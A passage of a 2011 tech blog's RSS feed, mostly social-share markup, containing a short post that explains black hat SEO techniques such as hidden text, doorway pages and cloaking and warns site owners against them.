			<a href="http://www.shareaholic.com/api/share/?title=CRE+Reloaded+hack+redirection+clean+up&amp;link=http://www.timbystechtalk.com/index.php/2011/04/06/cre-reloaded-hack-redirection-clean-up/&amp;notes=Just%20a%20quick%20post%20today%21%20I%20came%20across%20a%20clients%20site%20the%20other%20day%20that%20had%20been%20hacked%2C%20no%20matter%20what%20you%20did%20you%20would%20be%20redirected%20away%20to%20some%20spam%20site%20that%20tried%20to%20install%20a%20virus%20on%20your%20machine.%20The%20version%20of%20CRE%20that%20is%20running%20is%20CRE%20Loaded6%20v6.2%20Pro%20White%20Label%20with%20patch%3A12.1%20%28SP1%29.&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=88&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on LinkedIn">Share this on LinkedIn</a>
		</li>
		<li class="shr-reddit">
			<a href="http://www.shareaholic.com/api/share/?title=CRE+Reloaded+hack+redirection+clean+up&amp;link=http://www.timbystechtalk.com/index.php/2011/04/06/cre-reloaded-hack-redirection-clean-up/&amp;notes=Just%20a%20quick%20post%20today%21%20I%20came%20across%20a%20clients%20site%20the%20other%20day%20that%20had%20been%20hacked%2C%20no%20matter%20what%20you%20did%20you%20would%20be%20redirected%20away%20to%20some%20spam%20site%20that%20tried%20to%20install%20a%20virus%20on%20your%20machine.%20The%20version%20of%20CRE%20that%20is%20running%20is%20CRE%20Loaded6%20v6.2%20Pro%20White%20Label%20with%20patch%3A12.1%20%28SP1%29.&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=40&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-sphinn">
			<a href="http://www.shareaholic.com/api/share/?title=CRE+Reloaded+hack+redirection+clean+up&amp;link=http://www.timbystechtalk.com/index.php/2011/04/06/cre-reloaded-hack-redirection-clean-up/&amp;notes=Just%20a%20quick%20post%20today%21%20I%20came%20across%20a%20clients%20site%20the%20other%20day%20that%20had%20been%20hacked%2C%20no%20matter%20what%20you%20did%20you%20would%20be%20redirected%20away%20to%20some%20spam%20site%20that%20tried%20to%20install%20a%20virus%20on%20your%20machine.%20The%20version%20of%20CRE%20that%20is%20running%20is%20CRE%20Loaded6%20v6.2%20Pro%20White%20Label%20with%20patch%3A12.1%20%28SP1%29.&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=100&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Sphinn this on Sphinn">Sphinn this on Sphinn</a>
		</li>
		<li class="shr-stumbleupon">
			<a href="http://www.shareaholic.com/api/share/?title=CRE+Reloaded+hack+redirection+clean+up&amp;link=http://www.timbystechtalk.com/index.php/2011/04/06/cre-reloaded-hack-redirection-clean-up/&amp;notes=Just%20a%20quick%20post%20today%21%20I%20came%20across%20a%20clients%20site%20the%20other%20day%20that%20had%20been%20hacked%2C%20no%20matter%20what%20you%20did%20you%20would%20be%20redirected%20away%20to%20some%20spam%20site%20that%20tried%20to%20install%20a%20virus%20on%20your%20machine.%20The%20version%20of%20CRE%20that%20is%20running%20is%20CRE%20Loaded6%20v6.2%20Pro%20White%20Label%20with%20patch%3A12.1%20%28SP1%29.&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=38&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-twitter">
			<a href="http://www.shareaholic.com/api/share/?title=CRE+Reloaded+hack+redirection+clean+up&amp;link=http://www.timbystechtalk.com/index.php/2011/04/06/cre-reloaded-hack-redirection-clean-up/&amp;notes=Just%20a%20quick%20post%20today%21%20I%20came%20across%20a%20clients%20site%20the%20other%20day%20that%20had%20been%20hacked%2C%20no%20matter%20what%20you%20did%20you%20would%20be%20redirected%20away%20to%20some%20spam%20site%20that%20tried%20to%20install%20a%20virus%20on%20your%20machine.%20The%20version%20of%20CRE%20that%20is%20running%20is%20CRE%20Loaded6%20v6.2%20Pro%20White%20Label%20with%20patch%3A12.1%20%28SP1%29.&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=%24%7Btitle%7D+-+%24%7Bshort_link%7D&amp;service=7&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
</ul><div style="clear: both;"></div><div class="shr-getshr" style="visibility:hidden;font-size:10px !important"><a target="_blank" href="http://www.shareaholic.com/?src=pub">Get Shareaholic</a></div><div style="clear: both;"></div></div>

]]></content:encoded>
			<wfw:commentRss>http://www.timbystechtalk.com/index.php/2011/04/06/cre-reloaded-hack-redirection-clean-up/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>What is black hat SEO?</title>
		<link>http://www.timbystechtalk.com/index.php/2011/04/02/what-is-black-hat-seo/</link>
		<comments>http://www.timbystechtalk.com/index.php/2011/04/02/what-is-black-hat-seo/#comments</comments>
		<pubDate>Sat, 02 Apr 2011 10:57:54 +0000</pubDate>
		<dc:creator>Timby</dc:creator>
				<category><![CDATA[SEO]]></category>
		<category><![CDATA[black hat seo]]></category>
		<category><![CDATA[ethical seo]]></category>

		<guid isPermaLink="false">http://www.timbystechtalk.com/?p=333</guid>
		<description><![CDATA[If you have done a little bit of reading on Search Engine Optimization you have probably come across the term &#8220;Black Hat&#8221; in relation to SEO. I&#8217;ll start off with the recommendation of steering clear of any black hat techniques when it comes to optimizing your site, they often offer short term benefits but can [...]]]></description>
			<content:encoded><![CDATA[<p>If you have done a little bit of reading on Search Engine Optimization you have probably come across the term &#8220;Black Hat&#8221; in relation to SEO. I&#8217;ll start off with the recommendation of steering clear of any black hat techniques when it comes to optimizing your site, they often offer short term benefits but can lead to some serious penalties from google that could see your website drop completely off the rankings. This can cause big long term issues for your website and it may not rank ever again.</p>
<p>So what is considered black hat seo exactly? It generally consists of cloaking, link farming, hidden text, spamming meta tags, gateway pages, and other &#8220;illegal&#8221; methods of hiding content and keyword stuffing.</p>
<p style="text-align: center;"><img class="size-full wp-image-338 aligncenter" title="black hat seo" src="http://www.timbystechtalk.com/wp-content/uploads/2011/04/black-hat-seo.jpg" alt="" width="465" height="249" /></p>
<ol>
<li>Invisible text &#8211; This technique is simply hiding text on your page. For example putting black text on a black background so it isn&#8217;t visible.</li>
<li>Keyword stuffing &#8211; Google is pretty good at picking this up now so you are better off not stuffing your page with the same keyword over and over. Natural content is the way to go.</li>
<li>Spam &#8211; Just creating worthless pages of scrapped or poorly written worthless (keyword stuffed) articles for the purpose of just having content. Stay away from this sort of stuff, there is no long term win here.</li>
<li>Gateway/Doorway Page &#8211; These are spammy pages that are solely created to rank for a keyword and then redirect the user to another page. If these pages redirect a user without their knowledge (eg an auto redirect) it is considered a form of  &#8220;cloaking&#8221;.</li>
<li>Cloaking &#8211; This phrase refers to showing one page to the google bot and another to the user. This method is used a lot by pharmaceutical spammers where they will insert code into a webpage that will detect the user IP and if it matches a list of google IPs they will show the regular page content but if a normal website use comes onto the site they will be redirected to a pharmaceutical affiliate page.</li>
</ol>
<p>Keep your link building and content creation ethical and you will have no problems with your rankings (in most cases) and it is always the best way to fly when you have a long term goal in mind. Black hat SEO will also lead to banning from a lot of affiliate programs, including adsense, so ask yourself if the short term benefits outweigh the long term ones before you start messing with dodgy strategies.</p>


<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-caring-old">
<ul class="socials">
		<li class="shr-delicious">
			<a href="http://www.shareaholic.com/api/share/?title=What+is+black+hat+SEO%3F&amp;link=http://www.timbystechtalk.com/index.php/2011/04/02/what-is-black-hat-seo/&amp;notes=If%20you%20have%20done%20a%20little%20bit%20of%20reading%20on%20Search%20Engine%20Optimization%20you%20have%20probably%20come%20across%20the%20term%20%22Black%20Hat%22%20in%20relation%20to%20SEO.%20I%27ll%20start%20off%20with%20the%20recommendation%20of%20steering%20clear%20of%20any%20black%20hat%20techniques%20when%20it%20comes%20to%20optimizing%20your%20site%2C%20they%20often%20offer%20short%20term%20benefi&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=2&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-digg">
			<a href="http://www.shareaholic.com/api/share/?title=What+is+black+hat+SEO%3F&amp;link=http://www.timbystechtalk.com/index.php/2011/04/02/what-is-black-hat-seo/&amp;notes=If%20you%20have%20done%20a%20little%20bit%20of%20reading%20on%20Search%20Engine%20Optimization%20you%20have%20probably%20come%20across%20the%20term%20%22Black%20Hat%22%20in%20relation%20to%20SEO.%20I%27ll%20start%20off%20with%20the%20recommendation%20of%20steering%20clear%20of%20any%20black%20hat%20techniques%20when%20it%20comes%20to%20optimizing%20your%20site%2C%20they%20often%20offer%20short%20term%20benefi&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=3&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.shareaholic.com/api/share/?title=What+is+black+hat+SEO%3F&amp;link=http://www.timbystechtalk.com/index.php/2011/04/02/what-is-black-hat-seo/&amp;notes=If%20you%20have%20done%20a%20little%20bit%20of%20reading%20on%20Search%20Engine%20Optimization%20you%20have%20probably%20come%20across%20the%20term%20%22Black%20Hat%22%20in%20relation%20to%20SEO.%20I%27ll%20start%20off%20with%20the%20recommendation%20of%20steering%20clear%20of%20any%20black%20hat%20techniques%20when%20it%20comes%20to%20optimizing%20your%20site%2C%20they%20often%20offer%20short%20term%20benefi&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=5&amp;tags=&amp;ctype=" rel="nofollow" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-googlebookmarks">
			<a href="http://www.shareaholic.com/api/share/?title=What+is+black+hat+SEO%3F&amp;link=http://www.timbystechtalk.com/index.php/2011/04/02/what-is-black-hat-seo/&amp;notes=If%20you%20have%20done%20a%20little%20bit%20of%20reading%20on%20Search%20Engine%20Optimization%20you%20have%20probably%20come%20across%20the%20term%20%22Black%20Hat%22%20in%20relation%20to%20SEO.%20I%27ll%20start%20off%20with%20the%20recommendation%20of%20steering%20clear%20of%20any%20black%20hat%20techniques%20when%20it%20comes%20to%20optimizing%20your%20site%2C%20they%20often%20offer%20short%20term%20benefi&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=74&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Add this to Google Bookmarks">Add this to Google Bookmarks</a>
		</li>
		<li class="shr-linkedin">
			<a href="http://www.shareaholic.com/api/share/?title=What+is+black+hat+SEO%3F&amp;link=http://www.timbystechtalk.com/index.php/2011/04/02/what-is-black-hat-seo/&amp;notes=If%20you%20have%20done%20a%20little%20bit%20of%20reading%20on%20Search%20Engine%20Optimization%20you%20have%20probably%20come%20across%20the%20term%20%22Black%20Hat%22%20in%20relation%20to%20SEO.%20I%27ll%20start%20off%20with%20the%20recommendation%20of%20steering%20clear%20of%20any%20black%20hat%20techniques%20when%20it%20comes%20to%20optimizing%20your%20site%2C%20they%20often%20offer%20short%20term%20benefi&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=88&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on LinkedIn">Share this on LinkedIn</a>
		</li>
		<li class="shr-reddit">
			<a href="http://www.shareaholic.com/api/share/?title=What+is+black+hat+SEO%3F&amp;link=http://www.timbystechtalk.com/index.php/2011/04/02/what-is-black-hat-seo/&amp;notes=If%20you%20have%20done%20a%20little%20bit%20of%20reading%20on%20Search%20Engine%20Optimization%20you%20have%20probably%20come%20across%20the%20term%20%22Black%20Hat%22%20in%20relation%20to%20SEO.%20I%27ll%20start%20off%20with%20the%20recommendation%20of%20steering%20clear%20of%20any%20black%20hat%20techniques%20when%20it%20comes%20to%20optimizing%20your%20site%2C%20they%20often%20offer%20short%20term%20benefi&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=40&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-sphinn">
			<a href="http://www.shareaholic.com/api/share/?title=What+is+black+hat+SEO%3F&amp;link=http://www.timbystechtalk.com/index.php/2011/04/02/what-is-black-hat-seo/&amp;notes=If%20you%20have%20done%20a%20little%20bit%20of%20reading%20on%20Search%20Engine%20Optimization%20you%20have%20probably%20come%20across%20the%20term%20%22Black%20Hat%22%20in%20relation%20to%20SEO.%20I%27ll%20start%20off%20with%20the%20recommendation%20of%20steering%20clear%20of%20any%20black%20hat%20techniques%20when%20it%20comes%20to%20optimizing%20your%20site%2C%20they%20often%20offer%20short%20term%20benefi&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=100&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Sphinn this on Sphinn">Sphinn this on Sphinn</a>
		</li>
		<li class="shr-stumbleupon">
			<a href="http://www.shareaholic.com/api/share/?title=What+is+black+hat+SEO%3F&amp;link=http://www.timbystechtalk.com/index.php/2011/04/02/what-is-black-hat-seo/&amp;notes=If%20you%20have%20done%20a%20little%20bit%20of%20reading%20on%20Search%20Engine%20Optimization%20you%20have%20probably%20come%20across%20the%20term%20%22Black%20Hat%22%20in%20relation%20to%20SEO.%20I%27ll%20start%20off%20with%20the%20recommendation%20of%20steering%20clear%20of%20any%20black%20hat%20techniques%20when%20it%20comes%20to%20optimizing%20your%20site%2C%20they%20often%20offer%20short%20term%20benefi&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=38&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-twitter">
			<a href="http://www.shareaholic.com/api/share/?title=What+is+black+hat+SEO%3F&amp;link=http://www.timbystechtalk.com/index.php/2011/04/02/what-is-black-hat-seo/&amp;notes=If%20you%20have%20done%20a%20little%20bit%20of%20reading%20on%20Search%20Engine%20Optimization%20you%20have%20probably%20come%20across%20the%20term%20%22Black%20Hat%22%20in%20relation%20to%20SEO.%20I%27ll%20start%20off%20with%20the%20recommendation%20of%20steering%20clear%20of%20any%20black%20hat%20techniques%20when%20it%20comes%20to%20optimizing%20your%20site%2C%20they%20often%20offer%20short%20term%20benefi&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=%24%7Btitle%7D+-+%24%7Bshort_link%7D&amp;service=7&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
</ul><div style="clear: both;"></div><div class="shr-getshr" style="visibility:hidden;font-size:10px !important"><a target="_blank" href="http://www.shareaholic.com/?src=pub">Get Shareaholic</a></div><div style="clear: both;"></div></div>

]]></content:encoded>
			<wfw:commentRss>http://www.timbystechtalk.com/index.php/2011/04/02/what-is-black-hat-seo/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

